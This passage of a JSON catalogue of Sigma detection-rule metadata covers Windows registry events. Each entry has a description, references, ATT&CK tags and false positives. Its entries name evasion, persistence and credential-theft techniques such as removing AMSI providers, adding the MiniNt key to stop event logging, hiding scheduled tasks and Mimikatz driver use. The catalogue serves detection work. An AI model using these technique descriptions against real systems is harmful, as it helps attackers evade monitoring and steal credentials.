"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1220/T1220.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_xsl_script_processing.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1220" - ], - "creation_date": "2019/10/21", - "filename": "proc_creation_win_xsl_script_processing.yml", - "author": "Timur Zinniatullin, oscd.community", - "level": "medium", - "falsepositive": [ - "WMIC.exe FP depend on scripts and administrative methods used in the monitored environment.", - "Msxsl.exe is not installed by default, so unlikely.", - "Static format arguments - https://petri.com/command-line-wmi-part-3" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Raw disk access using illegitimate tools, possible defence evasion", - "uuid": "db809f10-56ce-4420-8c86-d6a7d793c79c", - "value": "Raw Disk Access Using Illegitimate Tools", - "meta": { - "refs": [ - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/raw_access_thread/raw_access_thread_disk_access_using_illegitimate_tools.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1006" - ], - "creation_date": "2019/10/22", - "filename": "raw_access_thread_disk_access_using_illegitimate_tools.yml", - "author": "Teymur Kheirkhabarov, oscd.community", - "level": "low", - "falsepositive": [ - "Legitimate Administrator using tool for raw access or ongoing forensic investigation" - ], - "logsource.category": "raw_access_thread", - "logsource.product": "windows" - } - }, - { - "description": "Detects when an attacker registers a new AMSI provider in order to achieve persistence", - "uuid": "33efc23c-6ea2-4503-8cfe-bdf82ce8f705", - "value": "Persistence Via New AMSI Providers", - "meta": { - "refs": [ - "https://persistence-info.github.io/Data/amsi.html", - "https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/FakeAMSI/FakeAMSI.c", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_amsi_providers_persistence.yml" - ], - "tags": [ - "attack.persistence" - ], - "creation_date": "2022/07/21", - "filename": "registry_add_amsi_providers_persistence.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Legitimate security products adding their own AMSI providers" - ], - "logsource.category": "registry_add", - "logsource.product": "windows" - } - }, - { - "description": "Detects creation of UserInitMprLogonScript persistence method", - "uuid": "9ace0707-b560-49b8-b6ca-5148b42f39fb", - "value": "Logon Scripts Creation in UserInitMprLogonScript Registry", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1037/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1037.001/T1037.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_logon_scripts_userinitmprlogonscript_reg.yml" - ], - "tags": [ - "attack.t1037.001", - "attack.persistence", - "attack.lateral_movement" - ], - "creation_date": "2019/01/12", - "filename": "registry_add_logon_scripts_userinitmprlogonscript_reg.yml", - "author": "Tom Ueltschi (@c_APT_ure)", - "level": "high", - "falsepositive": [ - "Exclude legitimate logon scripts" - ], - "logsource.category": "registry_add", - "logsource.product": "windows" - } - }, - { - "description": "Attempts to detect registry events for common NetWire key HKCU\\Software\\NetWire", - "uuid": "1d218616-71b0-4c40-855b-9dbe75510f7f", - "value": "NetWire RAT Registry Key", - "meta": { - "refs": [ - "https://www.fortinet.com/blog/threat-research/new-netwire-rat-variant-spread-by-phishing", - "https://resources.infosecinstitute.com/topic/netwire-malware-what-it-is-how-it-works-and-how-to-prevent-it-malware-spotlight/", - "https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/", - "https://blogs.blackberry.com/en/2021/09/threat-thursday-netwire-rat-is-coming-down-the-line", - "https://app.any.run/tasks/41ecdbde-4997-4301-a350-0270448b4c8f/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_mal_netwire.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2021/10/07", - "filename": "registry_add_mal_netwire.yml", - "author": "Christopher Peacock", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_add", - "logsource.product": "windows" - } - }, - { - "description": "Detects new registry key created by Ursnif malware.", - "uuid": "21f17060-b282-4249-ade0-589ea3591558", - "value": "Ursnif", - "meta": { - "refs": [ - "https://blog.yoroi.company/research/ursnif-long-live-the-steganography/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_mal_ursnif.yml" - ], - "tags": [ - "attack.execution", - "attack.t1112" - ], - "creation_date": "2019/02/13", - "filename": "registry_add_mal_ursnif.yml", - "author": "megan201296", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_add", - "logsource.product": "windows" - } - }, - { - "description": "Detects COM object hijacking via TreatAs subkey", - "uuid": "9b0f8a61-91b2-464f-aceb-0527e0a45020", - "value": "Windows Registry Persistence COM Key Linking", - "meta": { - "refs": [ - "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_persistence_key_linking.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.015" - ], - "creation_date": "2019/10/23", - "filename": "registry_add_persistence_key_linking.yml", - "author": "Kutepov Anton, oscd.community", - "level": "medium", - "falsepositive": [ - "Maybe some system utilities in rare cases use linking keys for backward compatibility" - ], - "logsource.category": "registry_add", - "logsource.product": "windows" - } - }, - { - "description": "Detects the of the \"accepteula\" key related to sysinternals tools being created from non sysinternals tools", - "uuid": "f50f3c09-557d-492d-81db-9064a8d4e211", - "value": "Usage of Renamed Sysinternals Tools", - "meta": { - "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_renamed_sysinternals_eula_accepted.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1588.002" - ], - "creation_date": "2022/08/24", - "filename": "registry_add_renamed_sysinternals_eula_accepted.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "registry_add", - "logsource.product": "windows" - } - }, - { - "description": "Detects the usage of Suspicious Sysinternals Tools such as PsExec, Procdump...etc via the \"accepteula\" key being added to Registry", - "uuid": "c7da8edc-49ae-45a2-9e61-9fd860e4e73d", - "value": "Usage of Suspicious Sysinternals Tools", - "meta": { - "refs": [ - "https://twitter.com/Moti_B/status/1008587936735035392", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_susp_sysinternals_eula_accepted.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1588.002" - ], - "creation_date": "2022/08/24", - "filename": "registry_add_susp_sysinternals_eula_accepted.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate use of SysInternals tools" - ], - "logsource.category": "registry_add", - "logsource.product": "windows" - } - }, - { - "description": "Detects the usage of Sysinternals Tools due to accepteula key being added to Registry", - "uuid": "25ffa65d-76d8-4da5-a832-3f2b0136e133", - "value": "Usage of Sysinternals Tools - Registry", - "meta": { - "refs": [ - "https://twitter.com/Moti_B/status/1008587936735035392", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_sysinternals_eula_accepted.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1588.002" - ], - "creation_date": "2017/08/28", - "filename": "registry_add_sysinternals_eula_accepted.yml", - "author": "Markus Neis", - "level": "low", - "falsepositive": [ - "Legitimate use of SysInternals tools", - "Programs that use the same Registry Key" - ], - "logsource.category": "registry_add", - "logsource.product": "windows" - } - }, - { - "description": "A General detection to trigger for the creation or modification of .*\\Software\\Sysinternals\\SDelete registry keys. Indicators of the use of Sysinternals SDelete tool.", - "uuid": "9841b233-8df8-4ad7-9133-b0b4402a9014", - "value": "Sysinternals SDelete Registry Keys", - "meta": { - "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/9", - "https://threathunterplaybook.com/evals/apt29/detections/4.B.2_59A9AC92-124D-4C4B-A6BF-3121C98677C3.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_sysinternals_sdelete_registry_keys.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.004" - ], - "creation_date": "2020/05/02", - "filename": "registry_add_sysinternals_sdelete_registry_keys.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_add", - "logsource.product": "windows" - } - }, - { - "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence.\nThe disk cleanup manager is part of the operating system. It displays the dialog box [\u2026]\nThe user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\n", - "uuid": "d4f4e0be-cf12-439f-9e25-4e2cdcf7df5a", - "value": "Persistence Via Disk Cleanup Handler - NewEntry", - "meta": { - "refs": [ - "https://persistence-info.github.io/Data/diskcleanuphandler.html", - "https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_set_disk_cleanup_handler_new_entry_persistence.yml" - ], - "tags": [ - "attack.persistence" - ], - "creation_date": "2022/07/21", - "filename": "registry_set_disk_cleanup_handler_new_entry_persistence.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate new entry added by windows" - ], - "logsource.category": "registry_add", - "logsource.product": "windows" - } - }, - { - "description": "Detects the removal of folders from the \"ProtectedFolders\" list of of exploit guard. Which could indicate an attacker trying to launch an encryption process", - "uuid": "272e55a4-9e6b-4211-acb6-78f51f0b1b40", - "value": "Removal Of Folder From ProtectedFolders In Exploit Guard", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_exploit_guard_protected_folders.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2022/08/05", - "filename": "registry_delete_exploit_guard_protected_folders.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Legitimate administrators removing applications (should always be monitored)" - ], - "logsource.category": "registry_delete", - "logsource.product": "windows" - } - }, - { - "description": "Detects the deletion of registry keys containing the MSTSC connection history", - "uuid": "07bdd2f5-9c58-4f38-aec8-e101bb79ef8d", - "value": "Terminal Server Client Connection History Cleared", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer", - "http://woshub.com/how-to-clear-rdp-connections-history/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_mstsc_history_cleared.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1112" - ], - "creation_date": "2021/10/19", - "filename": "registry_delete_mstsc_history_cleared.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_delete", - "logsource.product": "windows" - } - }, - { - "description": "Remove the AMSI Provider registry key in HKLM\\Software\\Microsoft\\AMSI to disable AMSI inspection", - "uuid": "41d1058a-aea7-4952-9293-29eaaf516465", - "value": "Removal Of Amsi Provider Reg Key", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://seclists.org/fulldisclosure/2020/Mar/45", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2021/06/07", - "filename": "registry_delete_removal_amsi_registry_key.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "registry_delete", - "logsource.product": "windows" - } - }, - { - "description": "A General detection to trigger for processes removing .*\\shell\\open\\command registry keys. Registry keys that might have been used for COM hijacking activities.", - "uuid": "96f697b0-b499-4e5d-9908-a67bec11cdb6", - "value": "Removal of Potential COM Hijacking Registry Keys", - "meta": { - "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/7", - "https://threathunterplaybook.com/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.html", - "https://docs.microsoft.com/en-us/windows/win32/shell/launch", - "https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand", - "https://docs.microsoft.com/en-us/windows/win32/shell/shell-and-managed-code", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2020/05/02", - "filename": "registry_delete_removal_com_hijacking_registry_key.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "medium", - "falsepositive": [ - "Legitimate software (un)installations are known to cause some false positives. Please add them as a filter when encountered" - ], - "logsource.category": "registry_delete", - "logsource.product": "windows" - } - }, - { - "description": "Detects when the \"index\" value of a scheduled task is removed or deleted from the registry. Which effectively hides it from any tooling such as \"schtasks /query\"", - "uuid": "526cc8bc-1cdc-48ad-8b26-f19bff969cec", - "value": "Removal Of Index Value to Hide Schedule Task", - "meta": { - "refs": [ - "https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_index_value_scheduled_task_hide.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562" - ], - "creation_date": "2022/08/26", - "filename": "registry_delete_removal_index_value_scheduled_task_hide.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_delete", - "logsource.product": "windows" - } - }, - { - "description": "Remove SD (Security Descriptor) value in \\Schedule\\TaskCache\\Tree registry hive to hide schedule task. This technique is used by Tarrask malware", - "uuid": "acd74772-5f88-45c7-956b-6a7b36c294d2", - "value": "Removal Of SD Value to Hide Schedule Task", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_sd_value_scheduled_task_hide.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562" - ], - "creation_date": "2022/04/15", - "filename": "registry_delete_removal_sd_value_scheduled_task_hide.yml", - "author": "Sittikorn S", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_delete", - "logsource.product": "windows" - } - }, - { - "description": "Sysmon registry detection of a local hidden user account.", - "uuid": "460479f3-80b7-42da-9c43-2cc1d54dbccd", - "value": "Creation of a Local Hidden User Account by Registry", - "meta": { - "refs": [ - "https://twitter.com/SBousseaden/status/1387530414185664538", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_add_local_hidden_user.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1136.001" - ], - "creation_date": "2021/05/03", - "filename": "registry_event_add_local_hidden_user.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018", - "uuid": "7bdf2a7c-3acc-4091-9581-0a77dad1c5b5", - "value": "Chafer Activity - Registry", - "meta": { - "refs": [ - "https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_chafer_mar18.yml" - ], - "tags": [ - "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" - ], - "creation_date": "2018/03/23", - "filename": "registry_event_apt_chafer_mar18.yml", - "author": "Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects registry key used by Leviathan APT in Malaysian focused campaign", - "uuid": "70d43542-cd2d-483c-8f30-f16b436fd7db", - "value": "Leviathan Registry Key Activity", - "meta": { - "refs": [ - "https://www.elastic.co/blog/advanced-techniques-used-in-malaysian-focused-apt-campaign", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_leviathan.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "creation_date": "2020/07/07", - "filename": "registry_event_apt_leviathan.yml", - "author": "Aidan Bracher", - "level": "critical", - "falsepositive": "No established falsepositives", - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects registry keys created in OceanLotus (also known as APT32) attacks", - "uuid": "4ac5fc44-a601-4c06-955b-309df8c4e9d4", - "value": "OceanLotus Registry Activity", - "meta": { - "refs": [ - "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", - "https://github.com/eset/malware-ioc/tree/master/oceanlotus", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_oceanlotus_registry.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2019/04/14", - "filename": "registry_event_apt_oceanlotus_registry.yml", - "author": "megan201296, Jonhnathan Ribeiro", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects Pandemic Windows Implant", - "uuid": "47e0852a-cf81-4494-a8e6-31864f8c86ed", - "value": "Pandemic Registry Key", - "meta": { - "refs": [ - "https://wikileaks.org/vault7/#Pandemic", - "https://twitter.com/MalwareJake/status/870349480356454401", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_pandemic.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1105" - ], - "creation_date": "2017/06/01", - "filename": "registry_event_apt_pandemic.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Unfixed method for UAC bypass from windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry.", - "uuid": "6ea3bf32-9680-422d-9f50-e90716b12a66", - "value": "UAC Bypass Via Wsreset", - "meta": { - "refs": [ - "https://www.bleepingcomputer.com/news/security/trickbot-uses-a-new-windows-10-uac-bypass-to-launch-quietly", - "https://lolbas-project.github.io/lolbas/Binaries/Wsreset", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_bypass_via_wsreset.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "creation_date": "2020/10/07", - "filename": "registry_event_bypass_via_wsreset.yml", - "author": "oscd.community, Dmitry Uchakin", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", - "uuid": "b6d235fc-1d38-4b12-adbe-325f06728f37", - "value": "CMSTP Execution Registry Event", - "meta": { - "refs": [ - "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_cmstp_execution_by_registry.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218.003", - "attack.g0069", - "car.2019-04-001" - ], - "creation_date": "2018/07/16", - "filename": "registry_event_cmstp_execution_by_registry.yml", - "author": "Nik Seetharaman", - "level": "high", - "falsepositive": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, Windows Event Log service will stopped write events.", - "uuid": "919f2ef0-be2d-4a7a-b635-eb2b41fde044", - "value": "Disable Security Events Logging Adding Reg Key MiniNt", - "meta": { - "refs": [ - "https://twitter.com/0gtweet/status/1182516740955226112", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_disable_security_events_logging_adding_reg_key_minint.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1112" - ], - "creation_date": "2019/10/25", - "filename": "registry_event_disable_security_events_logging_adding_reg_key_minint.yml", - "author": "Ilyas Ochkov, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects potential malicious modification of the property value of IsCredGuardEnabled from\nHKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to disable Cred Guard on a system.\nThis is usually used with UseLogonCredential to manipulate the caching credentials.\n", - "uuid": "1a2d6c47-75b0-45bd-b133-2c0be75349fd", - "value": "Wdigest CredGuard Registry Modification", - "meta": { - "refs": [ - "https://teamhydra.blog/2020/08/25/bypassing-credential-guard/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_disable_wdigest_credential_guard.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2019/08/25", - "filename": "registry_event_disable_wdigest_credential_guard.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Diag\\\\VolSnap\\\\Volume are captured.", - "uuid": "5aad0995-46ab-41bd-a9ff-724f41114971", - "value": "Esentutl Volume Shadow Copy Service Keys", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.002" - ], - "creation_date": "2020/10/20", - "filename": "registry_event_esentutl_volume_shadow_copy_service_keys.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of Windows Credential Editor (WCE)", - "uuid": "a6b33c02-8305-488f-8585-03cb2a7763f2", - "value": "Windows Credential Editor Registry", - "meta": { - "refs": [ - "https://www.ampliasecurity.com/research/windows-credentials-editor/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_hack_wce_reg.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0005" - ], - "creation_date": "2019/12/31", - "filename": "registry_event_hack_wce_reg.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.", - "uuid": "ac8866c7-ce44-46fd-8c17-b24acff96ca8", - "value": "HybridConnectionManager Service Installation - Registry", - "meta": { - "refs": [ - "https://twitter.com/Cyb3rWard0g/status/1381642789369286662", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_hybridconnectionmgr_svc_installation.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1608" - ], - "creation_date": "2021/04/12", - "filename": "registry_event_hybridconnectionmgr_svc_installation.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the presence of a registry key created during Azorult execution", - "uuid": "f7f9ab88-7557-4a69-b30e-0a8f91b3a0e7", - "value": "Registry Entries For Azorult Malware", - "meta": { - "refs": [ - "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/trojan.win32.azoruit.a", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_mal_azorult.yml" - ], - "tags": [ - "attack.execution", - "attack.t1112" - ], - "creation_date": "2020/05/08", - "filename": "registry_event_mal_azorult.yml", - "author": "Trent Liffick", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects FlowCloud malware from threat group TA410.", - "uuid": "5118765f-6657-4ddb-a487-d7bd673abbf1", - "value": "FlowCloud Malware", - "meta": { - "refs": [ - "https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_mal_flowcloud.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1112" - ], - "creation_date": "2020/06/09", - "filename": "registry_event_mal_flowcloud.yml", - "author": "NVISO", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527", - "uuid": "ba6b9e43-1d45-4d3c-a504-1043a64c8469", - "value": "PrinterNightmare Mimimkatz Driver Name", - "meta": { - "refs": [ - "https://github.com/gentilkiwi/mimikatz/commit/c21276072b3f2a47a21e215a46962a17d54b3760", - "https://www.lexjansen.com/sesug/1993/SESUG93035.pdf", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_mimikatz_printernightmare.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204", - "cve.2021.1675", - "cve.2021.34527" - ], - "creation_date": "2021/07/04", - "filename": "registry_event_mimikatz_printernightmare.yml", - "author": "Markus Neis, @markus_neis, Florian Roth", - "level": "critical", - "falsepositive": [ - "Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely)" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects value modification of registry key containing path to binary used as screensaver.", - "uuid": "67a6c006-3fbe-46a7-9074-2ba3b82c3000", - "value": "Path To Screensaver Binary Modified", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md", - "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_modify_screensaver_binary_path.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.002" - ], - "creation_date": "2020/10/11", - "filename": "registry_event_modify_screensaver_binary_path.yml", - "author": "Bartlomiej Czyz @bczyz1, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate modification of screensaver" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects abusing Windows 10 Narrator's Feedback-Hub", - "uuid": "f663a6d9-9d1b-49b8-b2b1-0637914d199a", - "value": "Narrator's Feedback-Hub Persistence", - "meta": { - "refs": [ - "https://giuliocomi.blogspot.com/2019/10/abusing-windows-10-narrators-feedback.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_narrator_feedback_persistance.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "creation_date": "2019/10/25", - "filename": "registry_event_narrator_feedback_persistance.yml", - "author": "Dmitriy Lifanov, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects NetNTLM downgrade attack", - "uuid": "d67572a0-e2ec-45d6-b8db-c100d14b8ef2", - "value": "NetNTLM Downgrade Attack - Registry", - "meta": { - "refs": [ - "https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_net_ntlm_downgrade.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1112" - ], - "creation_date": "2018/03/20", - "filename": "registry_event_net_ntlm_downgrade.yml", - "author": "Florian Roth, wagga", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_event", - "logsource.product": 